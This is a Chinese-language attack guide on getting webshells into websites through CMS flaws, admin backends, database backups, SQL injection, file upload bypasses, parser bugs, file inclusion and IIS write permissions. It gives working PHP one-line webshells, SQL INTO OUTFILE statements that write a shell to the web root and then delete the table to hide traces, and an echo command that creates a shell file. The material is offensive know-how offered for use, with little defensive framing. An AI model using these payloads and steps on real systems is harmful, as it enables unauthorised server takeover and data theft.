[TOC] # 獲取Webshell思路總結 ## 1??CMS獲取webshell方法： ### 1、什么是CMS? CMS系統指的是內容管理系統。已經有別人開發好了整個網站的前后端，使用者只需要部署cms，然后通過后臺添加數據，修改圖片等工作，就能搭建好一個的WEB系統。 ### 2、如何查看CMS相關信息？ 1. 如果已經攻破后臺，那么進入后臺之后CMS系統有可能直接顯示 2. 很多網站都會在網站的最下方信息中顯示CMS版本信息 3. 通過web指紋識別掃描器掃描 常用的為御劍WEB指紋識別系統 4. 通過瀏覽器的插件查看指紋信息 火狐和Google推薦用wappalyzer ### 3、如何獲取CMS的webshell? 找到網站使用的cms版本信息后，通過搜索引擎搜索，就可以得到相關版本獲取webshell的方法 搜索關鍵字如：“wordpress拿webshell”。 ## 2??非CMS獲取webshell： 更多的時候企業并不使用開源的CMS，而是選擇自己開發源代碼，這里的思路分為有權限和無權限兩方面來分析 ### 一、有管理權限的情況： 是指前期通過其他方法，已經破解了管理后臺功能，可以使用管理后臺的情況 #### **㈠、通過正常上傳一句話小馬獲取webshell** 1. 檢查網站是否過濾上傳文件后綴格式，如果未過濾直接上傳一句話小馬即可。 2. 找到網站默認配置，將一句話小馬插入配置中 因為有些網站沒有對配置參數進行過濾，所以配置中的小馬被讀取后，就可能被連接 建議先下載該站源碼，進行查看源碼過濾規則，以防插馬失敗。 插馬失敗很有可能會導致網站被你的小馬中沒有閉合標簽導致網站出錯。注意要閉合原有的代碼，保證語法正確，以免程序運行出錯。 #### **㈡、利用后臺數據庫備份獲取webshell** 一般網站都不允許上傳腳本類型文件，如 asp、php、jsp、aspx等文件。但一般后臺都會有數據庫備份功能。步驟如下 1. 上傳允許格式的小馬(如圖片馬) 2. 找到文件上傳后的文件路徑 3. 通過數據庫備份，指定備份源文件與與備份后格式。 如果后臺限制了備份路徑，可以嘗試F12修改文本框元素 #### ㈢、通過花樣上傳一句話小馬獲取Webshell 使用BurpSuite 工具，%00截斷、特殊名文件名繞過、文件名大小寫繞過、黑白名單繞過等等，想盡一切辦法就是要上傳一句話木馬，通過各種變形，萬變不離其宗，換湯不換藥。 #### ㈣、通過編輯模塊、標簽等拿WebShell ①通過對網站的**模塊**進行編輯寫入一句話，然后生成腳本文件拿WebShell ②通過將木馬添加到壓縮文件，把名字改為**網站模板類型**，上傳到網站服務器，拿WebShell #### ㈤、SQL命令獲取 有一定的數據庫權限的情況下，通過向數據庫表寫入馬，然后備份該表為腳本文件的方式進行 **大致步驟：** 1. 創建表 2. 將一句話寫入剛創建的表中 3. 查詢一句話所在表到文件，成功將一句話寫入文件 第一種方法： ```sql CREATE TABLE `mysql`.`best` (`best1` TEXT NOT NULL ); #將一句話木馬插入到mysql庫best表best1字段 INSERT INTO `mysql`.`best` (`best1` ) VALUES ('<?php @eval($_POST[password]);?>'); #查詢這個字段導出到網站的文件中 SELECT `best1` FROM `best` INTO OUTFILE 'd:/wamp/www/best.php'; #把痕跡清除 DROP TABLE IF EXISTS `best`; ``` 第二種方法： 優先推薦，簡單明了，且避免了誤刪別人的數據！ ```sql #直接將查詢出來的語句寫入文件 select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/best3.php' ``` #### ㈥、利用解析漏洞拿WebShell ``` 1）IIS5.x / 6.0 解析漏洞 2）IIS 7.0 / IIS 7.5 / Nginx <8.03 畸形解析漏洞 3）Nginx < 8.03 空字節代碼執行漏洞 4）Apache 解析漏洞 ``` 其他的還有命令執行漏洞，反序列化漏洞等 #### ㈦、利用編輯器漏洞拿WebShell 利用網站的編輯器上傳木馬，搜索已知的編輯器漏洞，常見的編輯器有 fckeditor、ewebeditor、cheditor等，有時候沒有管理員權限也可以拿下webshell。 #### ㈧、文件包含拿WebShell 1. 首先需要存在文件包含漏洞 2. 先將WebShell 改為txt格式文件上傳 3. 然后上傳一個腳本文件包含該txt格式文件 4. 通過這種方式，可繞過WAF拿WebShell #### ㈨、上傳其它腳本類型拿WebShell 1. 此類型用于一臺服務器具有多個網站 a網站是asp的站，b可能是php的站，分別限制了asp和php文件的上傳，可以嘗試向A上傳php的腳本，來拿Shell 2. 也可以嘗試將腳本文件后綴名改為asa 或者在后面直接加個點（.）如"xx.asp."， 來突破文件類型限制進行上傳拿WebShell #### ㈩、修改網站上傳類型配置來拿WebShell 某些網站，在網站上傳類型中限制了上傳腳本類型文件，我們可以去添加上傳文件類型如添加asp | php | jsp | aspx | asa 后綴名來拿WebShell ### 二、非管理權限 * * * #### ㈠、SQL注入漏洞 前提條件，具有足夠權限，對寫入木馬的文件夾有寫入權限，知道網站絕對路徑 ①可以通過log 備份、差異備份拿WebShell ②可以通過`into outfile`,`into outfile`函數(寫入函數)將一句話木馬寫入，拿WebShell。 ③利用phpmyadmin 將木馬導出，拿WebShell ④利用連接外連的數據庫拿WebShell ``` 1. 要有file_priv權限 2. 知道文件絕對路徑 3. 能使用union 4. 對web目錄有讀權限 5. 若過濾了單引號，則可以將函數中的字符進行hex編碼 ``` #### ㈡、xss和sql注入聯合利用 有些輸入框對一些符號過濾不嚴密（如<>，所以一般存在xss的地方就可以這么利用）我們可以在這里輸入一句話`<?php @eval($_POST['CE']);?>`，之后再用數據庫注入，查詢到文件into file成功插入一句話木馬 #### ㈢、IIS寫權限拿WebShell 有些網站的管理員在配置網站權限的時候疏忽，導致我們有寫權限，這種漏洞需要用工具來利用，已經很少見了，有專門的利用工具（桂林老兵）。 原理是通過找到有IIS 寫入權限的網站（開啟WebDeV），PUT進去一個.txt 格式的文件，目錄必須有刻寫的權限，如 image 文件夾，然后通過move 方法，把txt 格式的木馬用move 成腳本格式。 #### ㈣、遠程命令執行拿WebShell 在有php代碼執行漏洞,例如一些框架漏洞的時候可以通過執行一些系統命令進行拿WebShell。執行命令行命令“寫入如下內容到文件，會自動將創建木馬文件并將一句話木馬寫入其中，使用菜刀連接即可。 ``` echo ?php "@eval($_POST['CE']);?>" > x.php ``` #### ㈤、頭像上傳拿WebShell 大概思路： ①將大馬放在文件夾中 ②將文件夾壓縮成壓縮文件（zip） ③正常上傳一個頭像并且抓包 ④將數據包中圖片頭像的內容部分刪掉 ⑤重新寫入文件內容，將壓縮文件寫入到原本圖片的位置 ⑥上傳，之后返回包中會告訴我們絕對路徑